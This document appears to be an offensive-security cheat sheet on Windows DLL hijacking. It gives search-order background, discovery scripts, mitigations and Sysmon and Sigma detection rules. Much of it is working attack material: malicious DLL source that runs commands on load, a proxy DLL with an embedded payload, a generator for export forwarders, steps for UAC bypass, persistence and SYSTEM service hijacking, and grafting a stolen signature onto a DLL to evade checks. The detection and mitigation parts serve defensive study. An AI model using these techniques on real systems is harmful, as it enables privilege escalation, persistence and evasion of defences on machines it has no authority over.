🧠 Description

DLL Hijacking abuses the Windows DLL search order: a crafted DLL is placed where a legitimate application resolves a DLL name before (or instead of) the real one, so the application loads attacker code in its own security context. It is used for execution, privilege escalation, defense evasion (the parent is a trusted, often signed, process) and persistence.

Why DLL Hijacking Works:
  • Search Order: the application directory is always searched first, and with SafeDllSearchMode disabled the current working directory is searched before the system directories
  • Missing DLLs: applications import or LoadLibrary names that exist nowhere on the system ("phantom" DLLs), so the first writable directory in the order wins
  • Writable Directories: a directory earlier in the search order than the legitimate DLL is writable by a low-privileged user (application directory, PATH entry, CWD)
  • No Signature Validation: the loader does not check DLL authenticity unless the process opts in (binary-signature mitigation, WDAC); most applications don't

Windows DLL Search Order (SafeDllSearchMode enabled, the default since XP SP2; applies to DLLs loaded by bare name without LOAD_LIBRARY_SEARCH_* flags):

  0. Before any path search: already-loaded modules, KnownDLLs (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs) and manifest / .local redirection
  1. Application directory
  2. System directory (System32, or SysWOW64 for a 32-bit process)
  3. 16-bit system directory (C:\Windows\System)
  4. Windows directory
  5. Current working directory
  6. PATH environment directories

With SafeDllSearchMode = 0 the current working directory moves to position 2, directly after the application directory. Either way the application directory is searched first, which is why a writable application directory or a phantom DLL is enough.

🔍 DLL Hijacking Discovery

Find Missing DLLs:

# Use Procmon to find DLL load failures
# Filter: Path ends with .dll, Result is NAME NOT FOUND
# For each DLL name, the first NAME NOT FOUND hit is the directory the loader tried first;
# a name with no later SUCCESS anywhere is a phantom DLL

# PowerShell - static imports per executable (dumpbin from VS Tools), flagging
# imports that are neither beside the exe nor in System32. This only sees the
# import table; DLLs loaded at runtime with LoadLibrary need Procmon.
Get-ChildItem "C:\Program Files" -Recurse -Filter "*.exe" -ErrorAction SilentlyContinue | ForEach-Object {
    $exe = $_.FullName
    $dir = $_.DirectoryName
    $deps = (& dumpbin /nologo /dependents $exe 2>$null) | Where-Object { $_ -match '^\s+\S+\.dll$' } | ForEach-Object { $_.Trim() }
    foreach ($d in $deps) {
        if (-not (Test-Path (Join-Path $dir $d)) -and -not (Test-Path "$env:SystemRoot\System32\$d")) {
            "$exe -> $d (not in app dir or System32)"
        }
    }
}

# Quick check with dumpbin (VS Tools)
dumpbin /dependents application.exe

# List DLLs currently loaded by a running application (filter on the image name;
# piping the whole /m output through findstr only returns the process line itself)
tasklist /m /fi "imagename eq application.exe"

# Same from PowerShell, with full paths (run with the same bitness as the target, elevated for other users' processes)
Get-Process application | Select-Object -ExpandProperty Modules | Select-Object ModuleName, FileName

Find Writable Directories:

# Check common directories for write access; look for (W), (M) or (F) granted to
# Users, Authenticated Users or Everyone, with (OI)(CI) so it inherits to new files
icacls "C:\Windows\System32"
icacls "C:\Windows"
icacls "C:\Program Files"
icacls "C:\Program Files (x86)"

# Check if PATH directories are writable by ordinary users. Modify and FullControl
# imply write, so matching only "Write" misses them; the numeric values are the
# generic rights GENERIC_ALL (268435456) and GENERIC_WRITE (1073741824), which
# show up un-translated on inherited ACEs
$env:PATH -split ';' | Where-Object { $_ -and (Test-Path $_) } | ForEach-Object {
    $dir = $_
    (Get-Acl $dir).Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       $_.IdentityReference -match 'Users|Authenticated Users|Everyone' -and
                       $_.FileSystemRights -match 'Write|Modify|FullControl|268435456|1073741824' } |
        ForEach-Object { "{0} : {1} has {2}" -f $dir, $_.IdentityReference, $_.FileSystemRights }
}

# Use accesschk (Sysinternals): -w write access only, -d directories only, -q no banner, -s recurse, -u suppress errors
accesschk.exe -accepteula -wqd "Users" C:\Windows\Temp
accesschk.exe -accepteula -uwqds "Users" "C:\Program Files"
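The search order listed in the Description and the writable-directory checks above are two halves of the same question: for this executable and this DLL name, which directory does the loader settle on, and is any directory it tries before that one writable by me? The following function is an added example (not from this page's original content or any of the tools it names) that walks the default search order for a given exe and DLL name, returns where the name resolves, and lists every earlier directory the current user can write to; an empty resolution with any writable directory is the phantom-DLL case. Assumptions: SafeDllSearchMode is enabled, the DLL is loaded by bare name (no LoadLibraryEx search flags), no manifest or .local redirection applies, and the exe and DLL names in the usage line are placeholders.

```powershell
# Resolve where the loader would find a DLL for a given executable under the
# default (SafeDllSearchMode=1) search order, and report every directory that
# is searched BEFORE the resolving one and is writable by the current user.
# Assumes load by bare name, no LOAD_LIBRARY_SEARCH_* flags, no manifest
# or .local redirection, and a process of the OS bitness (System32, not SysWOW64).
function Test-DllHijackable {
    param(
        [Parameter(Mandatory)][string]$ExePath,
        [Parameter(Mandatory)][string]$DllName
    )
    # KnownDLLs are mapped from the \KnownDlls object directory and never hit the search path
    $known = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs'
    if ($known.PSObject.Properties.Value -contains $DllName) {
        return [pscustomobject]@{ Dll = $DllName; ResolvedFrom = 'KnownDLLs'; WritableBefore = @() }
    }

    $sys   = $env:SystemRoot
    $order = @(
        [IO.Path]::GetDirectoryName([IO.Path]::GetFullPath($ExePath)),  # 1. application directory
        "$sys\System32",                                               # 2. system directory
        "$sys\System",                                                 # 3. 16-bit system directory
        $sys,                                                          # 4. Windows directory
        (Get-Location).Path                                            # 5. current working directory
    ) + ($env:PATH -split ';' | Where-Object { $_ })                   # 6. PATH, in order

    $writable = @()
    foreach ($dir in $order) {
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
        if (Test-Path -LiteralPath (Join-Path $dir $DllName)) {
            # First hit wins: this is the DLL the process will actually load
            return [pscustomobject]@{ Dll = $DllName; ResolvedFrom = $dir; WritableBefore = $writable }
        }
        # Probe write access by creating and deleting a scratch file; reading the
        # ACL misses inheritance, deny ACEs and group membership subtleties
        $probe = Join-Path $dir ([IO.Path]::GetRandomFileName())
        try {
            [IO.File]::WriteAllText($probe, '')
            $writable += $dir
            Remove-Item -LiteralPath $probe -Force
        } catch {}
    }
    # Phantom DLL: nothing resolves, so any writable directory in the order wins
    [pscustomobject]@{ Dll = $DllName; ResolvedFrom = $null; WritableBefore = $writable }
}

# Placeholder target; a non-empty WritableBefore means the load can be redirected
Test-DllHijackable -ExePath 'C:\Program Files\App\app.exe' -DllName 'version.dll' | Format-List
```

Run it as the low-privileged user you intend to operate as: the write probe reflects that user's effective rights, so as an administrator it will happily report System32 as writable. Probing leaves no files behind on success, but it does touch every directory in the order, which is visible to file-system auditing.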

Automated Discovery (FinDLL, dll-hijack-detector):

# Using PowerSploit/PowerUp (Find-ProcessDLLHijack lives in PowerUp.ps1)
Import-Module .\PowerUp.ps1
Find-ProcessDLLHijack -ProcessName notepad

# All running processes: loaded modules whose name could be served from a writable directory earlier in the search order
Find-ProcessDLLHijack

# Writable directories on the system PATH (the last stop for phantom DLLs)
Find-PathDLLHijack

# Using winPEAS (writable PATH entries and writable program directories are among its checks)
winpeas.exe quiet

# Confirm a DLL name that Procmon reported as NAME NOT FOUND is really absent from the searched directories (true phantom)
Get-ChildItem $env:SystemRoot, "C:\Program Files", "C:\Program Files (x86)" -Filter "missing.dll" -Recurse -ErrorAction SilentlyContinue

💣 Exploitation

1. Basic DLL Hijack (Write to Application Directory):

# Create malicious DLL (evil.c). If the target imports functions from the hijacked
# name, a DllMain-only DLL makes the load fail; it must export what the target
# expects (see DLL Proxying below)
#include <windows.h>

// Runs once when the DLL is mapped into the process that resolved our name
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        DisableThreadLibraryCalls(hinstDLL);   // no per-thread attach/detach calls
        // PoC payload: record the execution context. C:\temp must exist.
        // Spawning processes under loader lock is fragile; keep real payloads short here.
        WinExec("cmd.exe /c whoami > C:\\temp\\dll_hijack.txt", SW_HIDE);
    }
    return TRUE;
}

# Compile with MinGW (WinExec is in kernel32, linked by default; there is no -lwinapi32)
x86_64-w64-mingw32-gcc -shared -o evil.dll evil.c
# Bitness must match the target process: use i686-w64-mingw32-gcc for 32-bit applications

2. Masquerade as Missing DLL:

# Identify the missing DLL with Procmon: run a headless capture while the app starts
procmon.exe /AcceptEula /Quiet /Minimized /BackingFile capture.pml
# ... start the application, then stop the capture and open capture.pml in the UI
procmon.exe /Terminate
# Filter: Path ends with .dll, Result is NAME NOT FOUND; for each DLL name take the
# earliest directory the loader tried that you can write to

# Place the DLL in the application directory under the missing name (match the app's bitness)
copy evil.dll "C:\Program Files\App\legit.dll"

# When the app runs (or restarts), the loader resolves the name to your DLL

3. UAC Bypass via DLL Hijack:

# Auto-elevated binaries (Microsoft-signed, in a secure location, manifest autoElevate=true)
# start at High integrity without a prompt. If one resolves a DLL name from a
# directory a medium-integrity user can write to, that DLL runs elevated.
# Note: the popular eventvwr.exe and fodhelper.exe bypasses are registry hijacks
# (HKCU shell command / ms-settings handler), not DLL hijacks.

# Dump a binary's manifest to check for autoElevate (sigcheck from Sysinternals)
sigcheck64.exe -accepteula -m C:\Windows\System32\eventvwr.exe

# Record what the binary loads and from where (Procmon), then check whether any of
# those directories is writable. System32 itself is not writable by standard users,
# so the usable cases are missing DLLs that fall through to a writable PATH entry
where eventvwr.exe
icacls C:\Windows\System32

# DotLocal redirection: if a directory named <exe>.local exists next to the exe,
# non-KnownDLLs are loaded from it first. Creating it under System32 needs a
# write there, i.e. already-elevated rights, so on its own this is a persistence
# trick rather than a bypass:
mkdir C:\Windows\System32\fodhelper.exe.local
copy evil.dll C:\Windows\System32\fodhelper.exe.local\

4. Persistence via DLL Search Order Hijack:

# Identify an application that starts at boot/logon (Run keys, Startup folder, scheduled
# tasks, services) and either has a writable directory or asks for a DLL that does not exist
# Place the malicious DLL there; it runs every time the app starts, under the app's account

# Registry run key
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run

# Or scheduled task that runs app
schtasks /create /tn "TaskName" /tr "C:\Program Files\App\app.exe" /sc daily

🔐 Advanced DLL Techniques

1. DLL Proxying (Forward Exports):

# Get the original's export list (DLL Export Viewer or dumpbin /exports) and rename
# the real DLL to OriginalDLL_orig.dll. The proxy exports the same names: exports it
# does not care about are forwarded to the renamed original by the linker, hooked
# ones are implemented in the proxy.

// Proxy DLL (MSVC, C++); exports mirror OriginalDLL.dll
#include <windows.h>

// Untouched exports: forwarders the loader resolves from OriginalDLL_orig.dll
// (one pragma per export; SomeOtherFunction is a placeholder name)
#pragma comment(linker, "/EXPORT:SomeOtherFunction=OriginalDLL_orig.SomeOtherFunction")

// Hooked export: run the payload, then hand off to the real implementation.
// Calling OriginalFunction() directly here would recurse into this same function,
// so the real one is resolved by name from the renamed original.
typedef void (*OriginalFunction_t)(void);

extern "C" __declspec(dllexport) void OriginalFunction() {
    WinExec("calc.exe", SW_SHOW);
    HMODULE real = LoadLibraryA("OriginalDLL_orig.dll");
    OriginalFunction_t fn = real ? (OriginalFunction_t)GetProcAddress(real, "OriginalFunction") : NULL;
    if (fn) fn();
}

# Build as a DLL, then drop it under the original name beside the renamed original
# (or anywhere earlier in the search order)
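Writing one forwarder pragma per export by hand is error-prone for a DLL with dozens of them, and a single missed name breaks the host's load. The following helper is an added example (not part of this page's original content or of any tool it names): it parses the export directory of a PE file directly and prints one /EXPORT forwarder pragma per named export, skipping the names you intend to hook. Assumptions: the original is renamed to <stem>_orig.dll beside the proxy, exports are by name (ordinal-only exports are not emitted), and the version.dll / GetFileVersionInfoA usage at the bottom is illustrative.

```powershell
# Generate MSVC linker forwarder pragmas for a proxy DLL: every named export of
# the original is forwarded to the renamed original (<stem>_orig.dll), so the
# proxy only has to implement the functions it hooks. Parses the PE export
# directory itself; no dumpbin or export viewer required.
function Get-PeExports {
    param([Parameter(Mandatory)][string]$Path)
    $b  = [IO.File]::ReadAllBytes($Path)
    $pe = [BitConverter]::ToInt32($b, 0x3C)                               # e_lfanew
    if ([BitConverter]::ToUInt32($b, $pe) -ne 0x4550) { throw "Not a PE file: $Path" }   # "PE\0\0"
    $nSections = [BitConverter]::ToUInt16($b, $pe + 6)
    $optSize   = [BitConverter]::ToUInt16($b, $pe + 20)
    $opt       = $pe + 24                                                 # optional header
    $magic     = [BitConverter]::ToUInt16($b, $opt)
    $dirOff    = if ($magic -eq 0x20B) { 112 } else { 96 }                # PE32+ vs PE32 data directories
    $exportRva = [BitConverter]::ToUInt32($b, $opt + $dirOff)             # DataDirectory[0] = export table
    if ($exportRva -eq 0) { return @() }

    # Section table, needed to translate RVAs to file offsets
    $sections = for ($i = 0; $i -lt $nSections; $i++) {
        $s = $opt + $optSize + 40 * $i
        [pscustomobject]@{
            VA   = [BitConverter]::ToUInt32($b, $s + 12)
            Size = [Math]::Max([BitConverter]::ToUInt32($b, $s + 8), [BitConverter]::ToUInt32($b, $s + 16))
            Raw  = [BitConverter]::ToUInt32($b, $s + 20)
        }
    }
    function Rva2Off([uint32]$rva) {
        foreach ($s in $sections) { if ($rva -ge $s.VA -and $rva -lt ($s.VA + $s.Size)) { return $rva - $s.VA + $s.Raw } }
        throw "RVA 0x$($rva.ToString('X')) is not inside any section"
    }
    function ReadCString([int]$off) {
        $end = $off; while ($b[$end] -ne 0) { $end++ }
        [Text.Encoding]::ASCII.GetString($b, $off, $end - $off)
    }

    # IMAGE_EXPORT_DIRECTORY: Base @16, NumberOfNames @24, AddressOfNames @32, AddressOfNameOrdinals @36
    $exp      = Rva2Off $exportRva
    $base     = [BitConverter]::ToUInt32($b, $exp + 16)
    $numNames = [BitConverter]::ToUInt32($b, $exp + 24)
    $names    = Rva2Off ([BitConverter]::ToUInt32($b, $exp + 32))
    $ordinals = Rva2Off ([BitConverter]::ToUInt32($b, $exp + 36))
    for ($i = 0; $i -lt $numNames; $i++) {
        $nameOff = Rva2Off ([BitConverter]::ToUInt32($b, $names + 4 * $i))
        [pscustomobject]@{
            Name    = ReadCString $nameOff
            Ordinal = $base + [BitConverter]::ToUInt16($b, $ordinals + 2 * $i)   # biased ordinal, as the linker expects
        }
    }
}

function New-ProxyForwarders {
    param([Parameter(Mandatory)][string]$OriginalDll, [string[]]$Hook = @())
    $stem = [IO.Path]::GetFileNameWithoutExtension($OriginalDll)
    foreach ($e in Get-PeExports -Path $OriginalDll) {
        if ($Hook -contains $e.Name) { continue }   # hooked exports are implemented in the proxy source instead
        '#pragma comment(linker, "/EXPORT:{0}={1}_orig.{0},@{2}")' -f $e.Name, $stem, $e.Ordinal
    }
}

# Usage (illustrative target): copy the real version.dll to version_orig.dll beside the
# proxy, paste the output into the proxy source, and implement GetFileVersionInfoA yourself
New-ProxyForwarders -OriginalDll "$env:SystemRoot\System32\version.dll" -Hook 'GetFileVersionInfoA'
```

Keeping the original ordinals in the pragmas matters for hosts that import by ordinal; the loader would otherwise resolve them to the wrong function. The forwarder string deliberately omits the .dll extension, which is how the loader expects forwarders to be written.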

2. Phantom DLL Hijacking:

# "Phantom" DLL: the application asks for a name that exists nowhere on the system
# (leftover import, optional plugin, deprecated component). Since no directory
# resolves it, the loader walks the whole search order and the first directory
# you can write to wins, wherever the application itself lives.
# Confirm it is really absent before staging: Procmon shows NAME NOT FOUND for
# every directory in the order and no later SUCCESS for that name.

# Caveats that shrink the usable search order:
# - LoadLibraryEx with LOAD_LIBRARY_SEARCH_SYSTEM32 / SetDefaultDllDirectories:
#   only the selected directories are searched, so CWD and PATH never apply
# - SetDllDirectory("") removes the current directory from the order entirely;
#   SetDllDirectory(path) inserts that path right after the application
#   directory, which only helps if that path is writable
# - SafeDllSearchMode=0 (rare today) moves the current directory up to position 2

3. DLL Sideloading (Side Loading):

# Side-loading: a legitimately signed executable that loads a DLL by name from its
# own directory is copied, together with a malicious DLL of that name, into a
# directory you control. The signed parent is what the endpoint agent sees; your
# DLL is what it loads. The DLL must export whatever the parent imports (see proxying).

# Optional: graft the Authenticode signature block of a signed DLL onto yours.
# The result LOOKS signed in the file properties dialog and to tools that only
# test for the presence of a signature, but fails real verification because the
# hash inside the signature does not match the file.
python3 sigthief.py -i legitimate.dll -t malicious.dll -o malicious_signed.dll

# Confirm what a verifier sees (signtool ships with the Windows SDK; codesign is a
# macOS tool and does not apply here)
signtool verify /pa /v malicious_signed.dll

🎯 Persistence via DLL Hijack

Scheduled Task Hijack:

# Find scheduled tasks, the executables they run and the account they run as
# (findstr has no \| alternation; each /C: is a separate literal search string)
schtasks /query /fo LIST /v | findstr /i /C:"TaskName:" /C:"Task To Run:" /C:"Run As User:"

# Check if executable's directory is writable
icacls "C:\Scheduled App Path"

# Place malicious DLL in that directory

Service Binary Path Hijack:

# Find services, their binaries and the account they run as (SYSTEM-context
# services are the prize: a DLL they load from a writable path runs as LocalSystem)
Get-CimInstance Win32_Service | Select-Object Name, PathName, StartMode, StartName

# If C:\Program Files\App\service.exe uses C:\Windows\Temp\app.dll
# And C:\Windows\Temp is writable, place DLL there; it loads on the next service start

🛡️ Mitigation

✅ Primary Controls:
  • Safe DLL Search: keep SafeDllSearchMode = 1 (the default); it only moves the current directory behind the system directories, the application directory is still searched first
  • Remove Writable PATH: no user-writable directories on the system PATH, and no user-writable application directories (install under Program Files, not %LOCALAPPDATA%)
  • Code Integrity: WDAC or AppLocker DLL rules, or the per-process binary-signature mitigation (SetProcessMitigationPolicy with ProcessSignaturePolicy, MicrosoftSignedOnly) so unsigned DLLs cannot load
  • Restrict the Search in Code: SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_DEFAULT_DIRS) or LoadLibraryEx with LOAD_LIBRARY_SEARCH_SYSTEM32; SetDllDirectory("") removes the current directory from the order
  • Load DLLs with Full Path: and ship every DLL the application imports, so nothing is left as a phantom name

Enable Safe DLL Search Mode:

# Registry setting (default is 1 on XP SP2 / Server 2003 and later; a missing value means enabled)
REG ADD "HKLM\System\CurrentControlSet\Control\Session Manager" /v SafeDllSearchMode /t REG_DWORD /d 1 /f

# Value 1 = current directory searched after the system directories (default)
# Value 0 = current directory searched right after the application directory (vulnerable)

# Companion setting (KB2264107): drop the current directory from the search order
# entirely (0xFFFFFFFF), or only when it is a remote share (2) or a WebDAV share (1)
REG ADD "HKLM\System\CurrentControlSet\Control\Session Manager" /v CWDIllegalInDllSearch /t REG_DWORD /d 0xFFFFFFFF /f

🔍 Detection

Sysmon DLL Load Monitoring:

# Sysmon Event ID 7 - Image loaded (ImageLoad must be enabled in the config; it is off by default and high-volume)
# Monitor for:
# - DLL loaded from unexpected locations (Temp, user profile, ProgramData) into a process that lives under Windows or Program Files
# - DLL that is unsigned or whose signature is not Valid (Signed / SignatureStatus fields)
# - Well-known sideload names (e.g. version.dll) loaded from anywhere but System32
# - Suspicious imports (WinExec, CreateRemoteThread): a static check on the captured file; Sysmon records hashes and signature status, not imports

# Sysmon config fragment: log image loads from Temp or user directories, or with an invalid signature
<Sysmon schemaversion="4.90">
  <EventFiltering>
    <RuleGroup name="DLL loads from user-writable paths" groupRelation="or">
      <ImageLoad onmatch="include">
        <ImageLoaded condition="contains">Temp</ImageLoaded>
        <ImageLoaded condition="contains">Users</ImageLoaded>
        <SignatureStatus condition="is">Invalid</SignatureStatus>
      </ImageLoad>
    </RuleGroup>
  </EventFiltering>
</Sysmon>

Sigma Rule for DLL Search Order Hijacking:

title: DLL Loaded From User-Writable Directory
id: dll-hijack        # placeholder; Sigma requires a unique UUID here
status: experimental
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|contains:
            - '\Users\'
            - '\Temp\'
            - '\Windows\Temp\'
    filter_signed:
        Signed: 'true'
        SignatureStatus: 'Valid'
    condition: selection and not filter_signed
falsepositives:
    - User-installed software loading its own unsigned components from the profile
level: medium
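The Sysmon fragment and the Sigma rule above both fire on the load path alone, which is noisy on any machine with user-installed software. As an added example (not part of the original page), the same logic as PowerShell triage over Sysmon Event ID 7: keep only loads from a user-writable path into a process that itself lives under Windows or Program Files, and whose DLL is unsigned or not Valid. That second condition is what separates a hijacked system application from a user-profile tool loading its own DLLs. The log name and field names are Sysmon's own; the sample records at the bottom are constructed, not real telemetry, so the scoring function can be exercised without Sysmon installed.

```powershell
# Triage Sysmon Event ID 7 (ImageLoad) for search-order hijack indicators:
# a DLL from a user-writable path, loaded into a process whose own image lives
# under Windows or Program Files, where the DLL is unsigned or its signature
# is not Valid. Requires ImageLoad enabled in the Sysmon config.
function Test-SuspiciousImageLoad {
    param([Parameter(Mandatory)][hashtable]$Load)   # keys: Image, ImageLoaded, Signed, SignatureStatus
    $userPaths = @('\Users\', '\Temp\', '\ProgramData\')
    $fromUserPath = $false
    foreach ($p in $userPaths) { if ($Load.ImageLoaded -like "*$p*") { $fromUserPath = $true } }
    # Hosts under system locations should not be pulling DLLs out of user-writable paths;
    # user-profile tools doing so is expected and is left to other rules
    $hostInSystemPath = ($Load.Image -like 'C:\Windows\*') -or ($Load.Image -like 'C:\Program Files*')
    $badSig = ($Load.Signed -ne 'true') -or ($Load.SignatureStatus -ne 'Valid')
    return ($fromUserPath -and $hostInSystemPath -and $badSig)
}

# Pull the most recent Event ID 7 records from the live Sysmon log and score them
function Get-SysmonDllHijackCandidates {
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 7 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            if (Test-SuspiciousImageLoad -Load $d) {
                [pscustomobject]@{ Time = $_.TimeCreated; Process = $d.Image; Dll = $d.ImageLoaded; Status = $d.SignatureStatus; Hashes = $d.Hashes }
            }
        }
}

# Constructed sample records (not real telemetry) to exercise the scoring offline:
# only the second one should be flagged
$samples = @(
    @{ Image = 'C:\Windows\System32\svchost.exe';         ImageLoaded = 'C:\Windows\System32\kernel32.dll';                  Signed = 'true';  SignatureStatus = 'Valid' },
    @{ Image = 'C:\Program Files\App\app.exe';            ImageLoaded = 'C:\Users\bob\AppData\Local\Temp\version.dll';       Signed = 'false'; SignatureStatus = 'Unavailable' },
    @{ Image = 'C:\Users\bob\AppData\Local\Tool\tool.exe'; ImageLoaded = 'C:\Users\bob\AppData\Local\Tool\helper.dll';       Signed = 'false'; SignatureStatus = 'Unavailable' }
)
$samples | ForEach-Object { "{0} <- {1} : {2}" -f $_.Image, $_.ImageLoaded, (Test-SuspiciousImageLoad -Load $_) }
```

Tune the path list to the environment (ProgramData in particular is used legitimately by updaters and agents), and feed the Hashes field of anything flagged into your file-reputation or static-analysis step; that is where the "suspicious imports" check from the bullet list actually happens.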

🛠️ Tools

  • Procmon: Monitor DLL loads in real-time
  • Winpeas: Find writable directories and DLL vulnerabilities
  • DLL Export Viewer: View DLL exports for proxying
  • SigThief: Copy digital signatures
  • PowerSploit/PowerUp Find-ProcessDLLHijack, Find-PathDLLHijack: Automated discovery
  • accesschk: Check directory permissions
  • sigcheck / signtool: Dump manifests (autoElevate) and verify Authenticode signatures